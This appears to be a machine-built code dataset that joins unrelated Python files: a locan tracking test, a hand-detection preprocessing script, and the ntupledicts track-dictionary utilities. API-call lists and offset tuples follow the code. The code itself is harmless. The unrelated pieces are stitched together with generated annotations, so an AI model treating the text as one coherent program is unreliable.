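# Illustrative reading of the fixture (comment only, inferred from the asserts
# below): with search_range=5 the eight localizations split into the tracks
# {0, 1, 2}, {10}, {20, 21}, {30} and {4}, i.e. 5 tracks; with memory=5 the
# point at 4 (frame 7) can rejoin the track that ended at 2 (frame 2),
# leaving 4 tracks.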
def test_track(locdata_simple):
locdata_new, track_series = track(locdata_simple, search_range=5)
# print(locdata_new.data)
assert "frame" in locdata_new.data.columns
assert len(locdata_new) == 5
locdata_new, track_series = track(locdata_simple, search_range=5, memory=5)
# print(locdata_new.data)
assert len(locdata_new) == 4
|
[
"pandas.DataFrame.from_dict",
"trackpy.quiet",
"pytest.fixture",
"pytest.mark.skipif",
"numpy.arange",
"locan.data.tracking.link_locdata",
"locan.data.tracking.track"
] |
[((271, 347), 'pytest.mark.skipif', 'pytest.mark.skipif', (["(not HAS_DEPENDENCY['trackpy'])"], {'reason': '"""requires trackpy"""'}), "(not HAS_DEPENDENCY['trackpy'], reason='requires trackpy')\n", (289, 347), False, 'import pytest\n'), ((453, 469), 'pytest.fixture', 'pytest.fixture', ([], {}), '()\n', (467, 469), False, 'import pytest\n'), ((389, 399), 'trackpy.quiet', 'tp_quiet', ([], {}), '()\n', (397, 399), True, 'from trackpy import quiet as tp_quiet\n'), ((819, 873), 'locan.data.tracking.link_locdata', 'link_locdata', (['locdata_simple'], {'search_range': '(5)', 'memory': '(0)'}), '(locdata_simple, search_range=5, memory=0)\n', (831, 873), False, 'from locan.data.tracking import link_locdata, track\n'), ((1014, 1051), 'locan.data.tracking.track', 'track', (['locdata_simple'], {'search_range': '(5)'}), '(locdata_simple, search_range=5)\n', (1019, 1051), False, 'from locan.data.tracking import link_locdata, track\n'), ((1194, 1241), 'locan.data.tracking.track', 'track', (['locdata_simple'], {'search_range': '(5)', 'memory': '(5)'}), '(locdata_simple, search_range=5, memory=5)\n', (1199, 1241), False, 'from locan.data.tracking import link_locdata, track\n'), ((679, 691), 'numpy.arange', 'np.arange', (['(8)'], {}), '(8)\n', (688, 691), True, 'import numpy as np\n'), ((728, 757), 'pandas.DataFrame.from_dict', 'pd.DataFrame.from_dict', (['dict_'], {}), '(dict_)\n', (750, 757), True, 'import pandas as pd\n')]
|
import os
import logging
import glob
import yaml
import joblib
import numpy as np
from mathtools import utils
from kinemparse import airplanecorpus
logger = logging.getLogger(__name__)
def makeBinLabels(action_labels, part_idxs_to_bins, num_samples):
no_bin = part_idxs_to_bins[0] # 0 is the index of the null part
bin_labels = np.full(num_samples, no_bin, dtype=int)
for part_index, start_index, end_index in action_labels:
bin_index = part_idxs_to_bins[part_index]
bin_labels[start_index:end_index + 1] = bin_index
return bin_labels
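# Illustrative example for makeBinLabels above (hypothetical indices): with
# action_labels = [(3, 10, 19)] and part_idxs_to_bins = {0: 0, 3: 2}, samples
# 10 through 19 are labelled with bin 2 and every other sample keeps the
# null bin 0.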
def main(
out_dir=None, hand_detections_dir=None, labels_dir=None,
plot_output=None, results_file=None, sweep_param_name=None):
hand_detections_dir = os.path.expanduser(hand_detections_dir)
labels_dir = os.path.expanduser(labels_dir)
out_dir = os.path.expanduser(out_dir)
if not os.path.exists(out_dir):
os.makedirs(out_dir)
out_data_dir = os.path.join(out_dir, 'data')
if not os.path.exists(out_data_dir):
os.makedirs(out_data_dir)
fig_dir = os.path.join(out_dir, 'figures')
if not os.path.exists(fig_dir):
os.makedirs(fig_dir)
def saveVariable(var, var_name):
joblib.dump(var, os.path.join(out_data_dir, f'{var_name}.pkl'))
logger = utils.setupRootLogger(filename=os.path.join(out_dir, 'log.txt'))
logger.info(f"Reading from: {hand_detections_dir}")
logger.info(f"Writing to: {out_dir}")
if results_file is None:
results_file = os.path.join(out_dir, 'results.csv')
# write_mode = 'w'
else:
results_file = os.path.expanduser(results_file)
# write_mode = 'a'
fig_dir = os.path.join(out_dir, 'figures')
if not os.path.exists(fig_dir):
os.makedirs(fig_dir)
out_data_dir = os.path.join(out_dir, 'data')
if not os.path.exists(out_data_dir):
os.makedirs(out_data_dir)
part_names, part_names_to_idxs, part_idxs_to_bins = airplanecorpus.loadParts()
for i, fn in enumerate(glob.glob(os.path.join(hand_detections_dir, '*.txt'))):
video_id = utils.stripExtension(fn).split('.handsdetections')[0]
logger.info(f"Processing video {video_id}")
hand_detections = airplanecorpus.loadHandDetections(
video_id, dir_name=hand_detections_dir, unflatten=True
)
hand_detections = hand_detections.reshape(hand_detections.shape[0], -1)
mean_detection = np.nanmean(hand_detections)
hand_detections[np.isnan(hand_detections)] = mean_detection
action_labels = airplanecorpus.loadLabels(
video_id, dir_name=labels_dir,
part_names_to_idxs=part_names_to_idxs
)
bin_labels = makeBinLabels(action_labels, part_idxs_to_bins, hand_detections.shape[0])
fig_fn = os.path.join(fig_dir, f"{video_id}.png")
utils.plot_array(hand_detections.T, (bin_labels,), ('bin',), fn=fig_fn)
video_id = video_id.replace('_', '-')
saveVariable(hand_detections, f'trial={video_id}_feature-seq')
saveVariable(bin_labels, f'trial={video_id}_label-seq')
if __name__ == "__main__":
# Parse command-line args and config file
cl_args = utils.parse_args(main)
config, config_fn = utils.parse_config(cl_args, script_name=__file__)
# Create output directory, instantiate log file and write config options
out_dir = os.path.expanduser(config['out_dir'])
if not os.path.exists(out_dir):
os.makedirs(out_dir)
with open(os.path.join(out_dir, config_fn), 'w') as outfile:
yaml.dump(config, outfile)
utils.copyFile(__file__, out_dir)
main(**config)
|
[
"numpy.full",
"mathtools.utils.copyFile",
"kinemparse.airplanecorpus.loadHandDetections",
"os.path.join",
"os.makedirs",
"kinemparse.airplanecorpus.loadParts",
"yaml.dump",
"os.path.exists",
"mathtools.utils.plot_array",
"numpy.isnan",
"kinemparse.airplanecorpus.loadLabels",
"mathtools.utils.parse_config",
"mathtools.utils.stripExtension",
"mathtools.utils.parse_args",
"os.path.expanduser",
"logging.getLogger",
"numpy.nanmean"
] |
[((161, 188), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (178, 188), False, 'import logging\n'), ((343, 382), 'numpy.full', 'np.full', (['num_samples', 'no_bin'], {'dtype': 'int'}), '(num_samples, no_bin, dtype=int)\n', (350, 382), True, 'import numpy as np\n'), ((749, 788), 'os.path.expanduser', 'os.path.expanduser', (['hand_detections_dir'], {}), '(hand_detections_dir)\n', (767, 788), False, 'import os\n'), ((806, 836), 'os.path.expanduser', 'os.path.expanduser', (['labels_dir'], {}), '(labels_dir)\n', (824, 836), False, 'import os\n'), ((852, 879), 'os.path.expanduser', 'os.path.expanduser', (['out_dir'], {}), '(out_dir)\n', (870, 879), False, 'import os\n'), ((965, 994), 'os.path.join', 'os.path.join', (['out_dir', '"""data"""'], {}), "(out_dir, 'data')\n", (977, 994), False, 'import os\n'), ((1085, 1117), 'os.path.join', 'os.path.join', (['out_dir', '"""figures"""'], {}), "(out_dir, 'figures')\n", (1097, 1117), False, 'import os\n'), ((1696, 1728), 'os.path.join', 'os.path.join', (['out_dir', '"""figures"""'], {}), "(out_dir, 'figures')\n", (1708, 1728), False, 'import os\n'), ((1814, 1843), 'os.path.join', 'os.path.join', (['out_dir', '"""data"""'], {}), "(out_dir, 'data')\n", (1826, 1843), False, 'import os\n'), ((1976, 2002), 'kinemparse.airplanecorpus.loadParts', 'airplanecorpus.loadParts', ([], {}), '()\n', (2000, 2002), False, 'from kinemparse import airplanecorpus\n'), ((3214, 3236), 'mathtools.utils.parse_args', 'utils.parse_args', (['main'], {}), '(main)\n', (3230, 3236), False, 'from mathtools import utils\n'), ((3261, 3310), 'mathtools.utils.parse_config', 'utils.parse_config', (['cl_args'], {'script_name': '__file__'}), '(cl_args, script_name=__file__)\n', (3279, 3310), False, 'from mathtools import utils\n'), ((3403, 3440), 'os.path.expanduser', 'os.path.expanduser', (["config['out_dir']"], {}), "(config['out_dir'])\n", (3421, 3440), False, 'import os\n'), ((3610, 3643), 'mathtools.utils.copyFile', 'utils.copyFile', (['__file__', 'out_dir'], {}), '(__file__, out_dir)\n', (3624, 3643), False, 'from mathtools import utils\n'), ((891, 914), 'os.path.exists', 'os.path.exists', (['out_dir'], {}), '(out_dir)\n', (905, 914), False, 'import os\n'), ((924, 944), 'os.makedirs', 'os.makedirs', (['out_dir'], {}), '(out_dir)\n', (935, 944), False, 'import os\n'), ((1006, 1034), 'os.path.exists', 'os.path.exists', (['out_data_dir'], {}), '(out_data_dir)\n', (1020, 1034), False, 'import os\n'), ((1044, 1069), 'os.makedirs', 'os.makedirs', (['out_data_dir'], {}), '(out_data_dir)\n', (1055, 1069), False, 'import os\n'), ((1129, 1152), 'os.path.exists', 'os.path.exists', (['fig_dir'], {}), '(fig_dir)\n', (1143, 1152), False, 'import os\n'), ((1162, 1182), 'os.makedirs', 'os.makedirs', (['fig_dir'], {}), '(fig_dir)\n', (1173, 1182), False, 'import os\n'), ((1524, 1560), 'os.path.join', 'os.path.join', (['out_dir', '"""results.csv"""'], {}), "(out_dir, 'results.csv')\n", (1536, 1560), False, 'import os\n'), ((1621, 1653), 'os.path.expanduser', 'os.path.expanduser', (['results_file'], {}), '(results_file)\n', (1639, 1653), False, 'import os\n'), ((1740, 1763), 'os.path.exists', 'os.path.exists', (['fig_dir'], {}), '(fig_dir)\n', (1754, 1763), False, 'import os\n'), ((1773, 1793), 'os.makedirs', 'os.makedirs', (['fig_dir'], {}), '(fig_dir)\n', (1784, 1793), False, 'import os\n'), ((1855, 1883), 'os.path.exists', 'os.path.exists', (['out_data_dir'], {}), '(out_data_dir)\n', (1869, 1883), False, 'import os\n'), ((1893, 1918), 'os.makedirs', 'os.makedirs', 
(['out_data_dir'], {}), '(out_data_dir)\n', (1904, 1918), False, 'import os\n'), ((2240, 2333), 'kinemparse.airplanecorpus.loadHandDetections', 'airplanecorpus.loadHandDetections', (['video_id'], {'dir_name': 'hand_detections_dir', 'unflatten': '(True)'}), '(video_id, dir_name=hand_detections_dir,\n unflatten=True)\n', (2273, 2333), False, 'from kinemparse import airplanecorpus\n'), ((2457, 2484), 'numpy.nanmean', 'np.nanmean', (['hand_detections'], {}), '(hand_detections)\n', (2467, 2484), True, 'import numpy as np\n'), ((2578, 2678), 'kinemparse.airplanecorpus.loadLabels', 'airplanecorpus.loadLabels', (['video_id'], {'dir_name': 'labels_dir', 'part_names_to_idxs': 'part_names_to_idxs'}), '(video_id, dir_name=labels_dir, part_names_to_idxs\n =part_names_to_idxs)\n', (2603, 2678), False, 'from kinemparse import airplanecorpus\n'), ((2822, 2862), 'os.path.join', 'os.path.join', (['fig_dir', 'f"""{video_id}.png"""'], {}), "(fig_dir, f'{video_id}.png')\n", (2834, 2862), False, 'import os\n'), ((2871, 2942), 'mathtools.utils.plot_array', 'utils.plot_array', (['hand_detections.T', '(bin_labels,)', "('bin',)"], {'fn': 'fig_fn'}), "(hand_detections.T, (bin_labels,), ('bin',), fn=fig_fn)\n", (2887, 2942), False, 'from mathtools import utils\n'), ((3452, 3475), 'os.path.exists', 'os.path.exists', (['out_dir'], {}), '(out_dir)\n', (3466, 3475), False, 'import os\n'), ((3485, 3505), 'os.makedirs', 'os.makedirs', (['out_dir'], {}), '(out_dir)\n', (3496, 3505), False, 'import os\n'), ((3579, 3605), 'yaml.dump', 'yaml.dump', (['config', 'outfile'], {}), '(config, outfile)\n', (3588, 3605), False, 'import yaml\n'), ((1246, 1291), 'os.path.join', 'os.path.join', (['out_data_dir', 'f"""{var_name}.pkl"""'], {}), "(out_data_dir, f'{var_name}.pkl')\n", (1258, 1291), False, 'import os\n'), ((1338, 1370), 'os.path.join', 'os.path.join', (['out_dir', '"""log.txt"""'], {}), "(out_dir, 'log.txt')\n", (1350, 1370), False, 'import os\n'), ((2041, 2083), 'os.path.join', 'os.path.join', (['hand_detections_dir', '"""*.txt"""'], {}), "(hand_detections_dir, '*.txt')\n", (2053, 2083), False, 'import os\n'), ((2509, 2534), 'numpy.isnan', 'np.isnan', (['hand_detections'], {}), '(hand_detections)\n', (2517, 2534), True, 'import numpy as np\n'), ((3520, 3552), 'os.path.join', 'os.path.join', (['out_dir', 'config_fn'], {}), '(out_dir, config_fn)\n', (3532, 3552), False, 'import os\n'), ((2106, 2130), 'mathtools.utils.stripExtension', 'utils.stripExtension', (['fn'], {}), '(fn)\n', (2126, 2130), False, 'from mathtools import utils\n')]
|
"""Basic operations on ntuple dicts and track property dicts."""
from random import shuffle
from random import seed as set_seed
from copy import deepcopy
from functools import reduce
from math import inf
from warnings import warn
from numpy import cumsum
from numpy import array
from numpy import delete
from numpy import where
def add_ntuple_dicts(ntuple_dicts):
"""Adds together multiple ntuple dicts of with the same track types
and track type properties. Raises an exception if the dicts do not
have this "sameness" property.
Args:
ntuple_dicts: a list of ntuple dicts with the same track types
and track type properties.
Returns:
An ntuple dictionary with the lists of values of each ntuple
dict in the input list concatenated.
"""
track_types = iter(next(iter(ntuple_dicts)).keys())
return dict(map(lambda track_type:
(track_type, add_track_prop_dicts(
list(map(lambda ntuple_dict: ntuple_dict[track_type],
ntuple_dicts)))),
track_types))
def add_track_prop_dicts(track_prop_dicts):
"""Adds together multiple track properties dicts of with the same
properties.
Args:
        track_prop_dicts: a list of track properties dicts with
the same properties.
Returns:
A track properties dictionary with the lists of values of each
track properties dict in the input list concatenated.
Raises:
ValueError: if there is no property shared by all of the track
property dicts.
"""
def add_two_track_prop_dicts(tp_so_far, tp_to_add):
"""Adds two track properties dicts together as per rules in
parent function. Returns the sum."""
props_in_common = set(tp_so_far.keys()).intersection(
set(tp_to_add.keys()))
if props_in_common != set(tp_to_add.keys()):
warn("Track property dicts have differing value lists. "
"Will add only properties in common: {}"
.format(props_in_common), UserWarning)
if not len(props_in_common):
raise ValueError("Track property dicts to add have no properties "
"in common.")
return dict(map(lambda track_property:
(track_property,
tp_so_far[track_property] + tp_to_add[track_property]),
props_in_common))
return reduce(add_two_track_prop_dicts, track_prop_dicts)
def mix_track_prop_dicts(track_prop_dicts, seed=None):
"""Mixes together multiple track properties dicts with the same
properties. 'Mixing', in this context, means to cut all other dicts
in the list down to the size of the smallest, and then shuffle them
all together.
Args:
        track_prop_dicts: a list of track properties dicts with
the same properties.
        seed: a seed for the random shuffling for reproducibility.
Returns:
A track properties dictionary containing an equal amount of
tracks from each track properties dictionary in the input list.
Raises:
ValueError: if there is no property shared by all of the track
property dicts.
"""
min_tpd_size = min(map(track_prop_dict_length, track_prop_dicts))
return shuffle_track_prop_dict(add_track_prop_dicts(map(
        lambda tpd: reduce_track_prop_dict(tpd, min_tpd_size, seed=seed),
track_prop_dicts)),
seed=seed)
def ntuple_dict_length(ntuple_dict):
"""Returns a dictionary from track types to the number of tracks of
    that type. Raises an exception if any value lists within one of its
track properties dicts are different lengths."""
return dict(map(lambda track_type, track_prop_dict:
(track_type, track_prop_dict_length(track_prop_dict)),
ntuple_dict.keys(), ntuple_dict.values()))
def track_prop_dict_length(track_prop_dict):
"""Returns the number of tracks in a track properties dictionary.
Raises an exception if the value lists in the input dictionary are
not all of the same length. Returns zero if the track properties
dict is empty."""
# A fancy way of checking if all value lists are the same length
val_list_lengths = set(map(len, track_prop_dict.values()))
if len(val_list_lengths) > 1:
raise ValueError("Invalid track prop dictionary: "
"value lists are of different sizes")
if len(val_list_lengths) == 0:
return 0
return next(iter(val_list_lengths))
class TrackPropertyDictIterator:
"""Iterates through tracks in a track properties dict, where each
track is represented as a dictionary from a value name to a single
property. Does not alter the original track properties dict."""
def __init__(self, track_prop_dict, increment=1):
self.tpd = deepcopy(track_prop_dict)
self.track_index = -1
self.increment = increment
self.num_tracks = track_prop_dict_length(track_prop_dict)
def __iter__(self):
return self
def __next__(self):
self.track_index += self.increment
if self.track_index < self.num_tracks:
return self._grab_track_by_index(self.tpd, self.track_index)
raise StopIteration
def _grab_track_by_index(self, track_prop_dict, track_index):
"""Returns a dictionary from track properties to single values
by selecting that value from each list in the track properties
dict."""
return dict(map(lambda property_name, val_list:
(property_name, val_list[track_index]),
track_prop_dict.keys(), track_prop_dict.values()))
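# Illustrative usage of TrackPropertyDictIterator above (comment only; the
# property names are made up):
#   for track in TrackPropertyDictIterator({"pt": [1, 2], "eta": [0.5, 0.6]}):
#       ...  # yields {"pt": 1, "eta": 0.5}, then {"pt": 2, "eta": 0.6}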
def shuffle_ntuple_dict(ntuple_dict, seed=None):
"""Returns an ntuple dict whose value lists have been shuffled. To
preserve association between them, value lists of trk and matchtp
as well as ones for tp and matchtrk have been shuffled in the same
way.
Args:
ntuple_dict: an ntuple dictionary.
        seed: a seed for the random shuffling for reproducibility.
Returns:
An ntuple dict with its value lists shuffled, preserving the
association between complementary track types.
"""
# Generate shuffled indices dictionary
ntuple_dict_num_tracks = ntuple_dict_length(ntuple_dict)
shuffled_indices_dict = {"trk": [], "matchtrk": [], "tp": [], "matchtp": []}
set_seed(seed)
def generate_shuffled_indices_dict_pair(track_type, track_prop_dict):
"""Generates a pair to be used in the construction of a
shuffled indices dictionary."""
tpd_indices = list(range(track_prop_dict_length(track_prop_dict)))
shuffle(tpd_indices)
return track_type, tpd_indices
shuffled_indices_dict.update(dict(map(generate_shuffled_indices_dict_pair,
ntuple_dict.keys(), ntuple_dict.values())))
# Ensure that the ntuple dict num tracks dict has the appropriate
# number of keys
ntuple_dict_num_tracks.update(dict(map(lambda track_type, indices:
(track_type, len(indices)),
shuffled_indices_dict.keys(), shuffled_indices_dict.values())))
# Ensure that same-length, complementary track types shuffle the same
if ntuple_dict_num_tracks["trk"] == ntuple_dict_num_tracks["matchtp"]:
shuffled_indices_dict["trk"] = shuffled_indices_dict["matchtp"]
if ntuple_dict_num_tracks["matchtrk"] == ntuple_dict_num_tracks["tp"]:
shuffled_indices_dict["matchtrk"] = shuffled_indices_dict["tp"]
return dict(map(lambda track_type, track_prop_dict:
(track_type, shuffle_track_prop_dict(
track_prop_dict, shuffled_indices_dict[track_type], seed)),
ntuple_dict.keys(), ntuple_dict.values()))
def shuffle_track_prop_dict(track_prop_dict, shuffled_indices=None, seed=None):
"""Returns a track properties dict whose value lists have been
shuffled.
Args:
track_prop_dict: a track properties dictionary.
shuffled_indices: a complete list of indices in the range of
the number of tracks in this track properties dict. Used
to completely determine a shuffling.
        seed: a seed for the random shuffling for reproducibility.
Returns:
A track properties dict whose value lists have been shuffled.
Raises:
ValueError: if shuffled_indices is different length than
track_prop_dict.
"""
def generate_shuffled_indices(tpd_length):
"""Generates a list of shuffled indices for use in shuffling
tracks in this track property dictionary."""
tpd_indices = list(range(tpd_length))
set_seed(seed)
shuffle(tpd_indices)
return tpd_indices
def shuffle_val_list(val_list, shuffled_indices):
"""Shuffles a value list depending on whether there are shuffled
indices or a random seed provided."""
return list(map(lambda i: val_list[i], shuffled_indices))
tpd_length = track_prop_dict_length(track_prop_dict)
if shuffled_indices is None:
shuffled_indices = generate_shuffled_indices(tpd_length)
if len(shuffled_indices) != tpd_length:
raise ValueError("shuffled_indices arg length ({}) differs from "
"track_prop_dict length ({})."
.format(len(shuffled_indices), tpd_length))
return dict(map(lambda property_name, val_list:
(property_name, shuffle_val_list(val_list, shuffled_indices)),
track_prop_dict.keys(), track_prop_dict.values()))
def reduce_ntuple_dict(ntuple_dict, track_limit,
shuffle_tracks=False, seed=None):
"""Reduces an ntuple dictionary to a number of tracks. If number of
tracks in the ntuple is less than the track limit specified, returns
all tracks. Can be used for convenient print debugging. Does not
affect the original ntuple dictionary.
Args:
ntuple_dict: an ntuple dict.
        track_limit: a dict from track type to the number of tracks to
            retain in each value list, or a single integer that will be
            expanded into such a dictionary.
shuffle_tracks: if True, shuffles the value lists before
reducing.
        seed: a seed for the shuffling, for reproducibility.
Returns:
An ntuple dictionary with track_limit tracks.
"""
# Get track_limit into correct form if it's an int
if isinstance(track_limit, int):
track_limit = dict(map(lambda track_type:
(track_type, track_limit),
ntuple_dict.keys()))
if shuffle_tracks:
ntuple_dict = shuffle_ntuple_dict(ntuple_dict, seed)
return dict(map(lambda track_type, track_prop_dict:
(track_type, reduce_track_prop_dict(
track_prop_dict, track_limit[track_type], shuffle_tracks=False)),
ntuple_dict.keys(), ntuple_dict.values()))
def reduce_track_prop_dict(track_prop_dict, track_limit, min_index=0,
shuffle_tracks=True, seed=None):
"""Reduces a track properties dictionary such that each of its value
lists are only a certain length. Does not affect the original track
property dictionary.
Args:
track_prop_dict: a track properties dict.
track_limit: the maximum length for a value list.
min_index: the first index to include in the result.
shuffle_tracks: if True, shuffles the value lists before
reducing.
        seed: a seed for the shuffling, for reproducibility.
Returns:
A track properties dictionary with reduced-length value lists.
"""
if shuffle_tracks:
track_prop_dict = shuffle_track_prop_dict(track_prop_dict, seed=seed)
return dict(map(lambda track_prop, track_prop_vals:
(track_prop, track_prop_vals[min_index:min(track_limit + min_index,
len(track_prop_vals))]),
track_prop_dict.keys(), track_prop_dict.values()))
def split_track_prop_dict(track_prop_dict, split_list):
"""Splits a track properties dict into smaller ones according to
the relative sizes of split_list elements. There is no option to
shuffle these, as the dict can be shuffled before splitting.
Args:
track_prop_dict: a track properties dict.
split_list: a list of positive values that determine the number
and relative sizes of the post-split track property dicts.
Returns:
A list of track property dicts.
"""
def get_split_sizes(split_list, num_tracks):
"""Returns the sizes of data by normalizing the provided split
        distribution and multiplying by the number of tracks in such
a way that the resulting sizes add up to the original tracks."""
split_list_total = sum(split_list)
split_sizes = list(map(lambda split_val:
int(split_val * num_tracks / split_list_total),
split_list))
# Ensure the split sizes add up to the total number of tracks
split_sizes[-1] += num_tracks - sum(split_sizes)
return split_sizes
split_boundaries = [0] + list(cumsum(get_split_sizes(split_list,
track_prop_dict_length(track_prop_dict))))
return list(map(lambda start_index, end_index:
reduce_track_prop_dict(track_prop_dict, end_index - start_index,
start_index, shuffle_tracks=False),
split_boundaries[:-1], split_boundaries[1:]))
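# Illustrative example for split_track_prop_dict above (comment only): with a
# 100-track dict, split_list=[3, 1] is normalized to sizes [75, 25], so the
# call returns two dicts holding the first 75 and the remaining 25 tracks.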
def select(*selector_key, invert=False):
"""Takes in a selector key and returns a selector that returns true
for selected values and false for non-selected values. This is how
cuts are applied in ntupledicts.
Args:
selector_key: If a single number, the selector will return true
for that number. If two numbers, the selector will return
true for numbers in that range, inclusive. If a list, will
treat each element of a list as a selector and logical OR
them together. This is done instead of AND, as AND can
simply be achieved by applying multiple selectors.
invert: Invert the selection. False by default.
Returns:
A selector, a function that returns true for some values and
false for all others.
Raises:
ValueError: for invalid selector keys.
"""
if len(selector_key) == 1:
key_contents = next(iter(selector_key))
if isinstance(key_contents, list):
selector = lambda val: any(map(
lambda sub_selector: sub_selector(val),
key_contents))
elif isinstance(key_contents, (float, int)):
selector = lambda val: val == next(iter(selector_key))
else:
raise ValueError("Invalid selector key type: {}."
.format(type(key_contents)))
elif len(selector_key) == 2:
selector = lambda val: selector_key[0] <= val <= selector_key[1]
else:
raise ValueError("Invalid selector key length: {}. Read the docs!"
.format(selector_key))
return lambda val: invert != selector(val)
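# Illustrative selector keys for select() above (comment only, taken from the
# docstring):
#   select(1)                          # true only for the value 1
#   select(0, 5)                       # true for values in [0, 5], inclusive
#   select([select(1), select(3, 4)])  # true for 1 or anything in [3, 4]
#   select(2, invert=True)             # true for everything except 2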
def cut_ntuple_dict(ntuple_dict, nd_selector):
"""Cuts an ntuple dictionary by cutting each track type according to
a selector dictionary, cutting those tracks not selected. Tracks are
cut "symmetrically" across corresponding groups, meaning that any
cuts applied to trks are applied to matchtps, and from tps to
matchtrks, and vice versa.
Args:
ntuple_dict: an ntuple dictionary
nd_selector: a selector for an ntuple dict
Returns:
A cut ntuple dictionary
"""
# Build list of tracks to cut from tp/matchtrk group and trk/matchtp groups
cut_indices_dict = {"trk": [], "matchtrk": [], "tp": [], "matchtp": []}
cut_indices_dict.update(dict(map(lambda track_type, cut_dict:
(track_type, select_indices(
ntuple_dict[track_type], cut_dict)),
nd_selector.keys(),
nd_selector.values())))
# Combine trk and matchtp, tp and matchtrk indices
# Sort and remove duplicates
trk_matchtp_indices_to_cut = sorted(
list(dict.fromkeys(cut_indices_dict["trk"] +\
cut_indices_dict["matchtp"])))
tp_matchtrk_indices_to_cut = sorted(
list(dict.fromkeys(cut_indices_dict["tp"] +\
cut_indices_dict["matchtrk"])))
cut_ntuple_dict = {}
for track_type in ntuple_dict.keys():
if track_type in ["trk", "matchtp"]:
indices_to_cut = trk_matchtp_indices_to_cut
if track_type in ["tp", "matchtrk"]:
indices_to_cut = tp_matchtrk_indices_to_cut
cut_ntuple_dict[track_type] = cut_track_prop_dict_by_indices(
ntuple_dict[track_type], indices_to_cut)
return cut_ntuple_dict
def cut_track_prop_dict(track_prop_dict, tpd_selector):
"""Cuts an track properties dictionary by cutting each track type
according to a cut dictionary.
Args:
track_prop_dict: a tracks properties dictionary.
tpd_selector: a selector for a tracks properties dictionary.
Returns:
A cut tracks properties dictionary.
"""
return cut_track_prop_dict_by_indices(track_prop_dict,
select_indices(track_prop_dict, tpd_selector))
def select_indices(track_prop_dict, tpd_selector, invert=True):
"""Selects indices from a tracks properties dictionary that meet the
conditions of the selector dictionary. If a property is in the
selector dict but not in the tracks properties dict, the program
    won't raise an exception, but will issue a warning.
Args:
track_prop_dict: a tracks properties dictionary.
tpd_selector: a dictionary from track property names to
selectors.
invert: return all indices NOT selected. Default is True. This
jibes with how this function is mainly used: track cuts.
Returns:
Indices from the track properties dict selected by the selector
dict.
"""
# Determine which selection conditions will be applied
for track_property in list(tpd_selector.keys()):
if track_property not in track_prop_dict.keys():
warn("{} not in tracks properties; will not select"
.format(track_property), UserWarning)
tpd_selector.pop(track_property)
tpd_length = track_prop_dict_length(track_prop_dict)
return list(set(sum(map(lambda track_property, selector:
list(where([invert != selector(val) for val in\
track_prop_dict[track_property]])[0]),
tpd_selector.keys(), tpd_selector.values()),
[])))
def cut_track_prop_dict_by_indices(track_prop_dict, indices_to_cut):
"""Takes in a list of indices to cut and cuts those indices from the
lists of the dictionary. Assumes that all lists in track_prop_dict
are the same size. This list of indices will frequently be generated
using get_indices_meeting_condition. The list of indices does not
have to be sorted by size.
Args:
track_prop_dict: a tracks properties dictionary.
indices_to_cut: a collection of indices to cut. Repeats are
tolerated, but out-of-range indices will result in an
exception.
Returns:
The same tracks properties dictionary with the given indices
on its value lists removed.
"""
track_properties = track_prop_dict.keys()
post_cuts_track_prop_dict = {}
for track_property in track_properties:
post_cuts_track_prop_dict[track_property] = list(delete(
array(track_prop_dict[track_property]), indices_to_cut))
return post_cuts_track_prop_dict
def normalize_ntuple_dict(ntuple_dict, normalize_dict=None):
"""Normalizes each value list in an ntuple dict. Does not attempt
to normalize values of the same property but different track types
in the same way.
Args:
ntuple_dict: an ntuple dict.
normalize_dict: a dictionary from track types to lists of
properties to normalize of that track type. If None,
normalizes all value lists.
Returns:
An ntuple dict with the appropriate value lists normalized.
"""
    base_normalize_dict = dict(map(lambda track_type: (track_type, None),
        ntuple_dict.keys()))
    if normalize_dict is not None:
        base_normalize_dict.update(normalize_dict)
return dict(map(lambda track_type:
(track_type, normalize_track_prop_dict(ntuple_dict[track_type],
base_normalize_dict[track_type])),
base_normalize_dict.keys()))
def normalize_track_prop_dict(track_prop_dict, props_to_normalize=None):
"""Returns a track prop dict of the same form as the original, but
each value list has been divided by its highest value. All values
are normalized by default, but only some will be normalized if a
list is given."""
if props_to_normalize is None:
props_to_normalize = list(track_prop_dict.keys())
else:
for track_property in props_to_normalize:
if track_property not in list(track_prop_dict.keys()):
warn("{} not in tracks properties; will not normalize"
.format(track_property), UserWarning)
return dict(map(lambda track_property:
(track_property, normalize_val_list(track_prop_dict[track_property])),
props_to_normalize))
def normalize_val_list(val_list):
"""Returns a list of numeric values by the size of their maximum
value."""
max_val = float(max(val_list))
return [ val/max_val if max_val != 0 else 0 for val in val_list ]
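# A minimal, illustrative demo of the operations above on toy data (the
# property names are made up and this block is not part of the library API);
# run the module directly to execute it.
if __name__ == "__main__":
    tpd_a = {"pt": [1.0, 2.0, 3.0], "eta": [0.1, 0.2, 0.3]}
    tpd_b = {"pt": [4.0, 5.0], "eta": [0.4, 0.5]}
    combined = add_track_prop_dicts([tpd_a, tpd_b])
    print(track_prop_dict_length(combined))  # 5 tracks after concatenation
    kept = cut_track_prop_dict(combined, {"pt": select(2.0, 4.0)})
    print(kept["pt"])  # only the tracks with pt in [2, 4]
    halves = split_track_prop_dict(combined, [1, 1])
    print([track_prop_dict_length(tpd) for tpd in halves])  # sizes [2, 3]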
|
[
"copy.deepcopy",
"random.shuffle",
"random.seed",
"numpy.array",
"functools.reduce"
] |
[((2434, 2484), 'functools.reduce', 'reduce', (['add_two_track_prop_dicts', 'track_prop_dicts'], {}), '(add_two_track_prop_dicts, track_prop_dicts)\n', (2440, 2484), False, 'from functools import reduce\n'), ((6406, 6420), 'random.seed', 'set_seed', (['seed'], {}), '(seed)\n', (6414, 6420), True, 'from random import seed as set_seed\n'), ((4861, 4886), 'copy.deepcopy', 'deepcopy', (['track_prop_dict'], {}), '(track_prop_dict)\n', (4869, 4886), False, 'from copy import deepcopy\n'), ((6684, 6704), 'random.shuffle', 'shuffle', (['tpd_indices'], {}), '(tpd_indices)\n', (6691, 6704), False, 'from random import shuffle\n'), ((8647, 8661), 'random.seed', 'set_seed', (['seed'], {}), '(seed)\n', (8655, 8661), True, 'from random import seed as set_seed\n'), ((8670, 8690), 'random.shuffle', 'shuffle', (['tpd_indices'], {}), '(tpd_indices)\n', (8677, 8690), False, 'from random import shuffle\n'), ((19731, 19769), 'numpy.array', 'array', (['track_prop_dict[track_property]'], {}), '(track_prop_dict[track_property])\n', (19736, 19769), False, 'from numpy import array\n')]
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Sat Jun 16 17:03:00 2018
@author: jumtsai
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
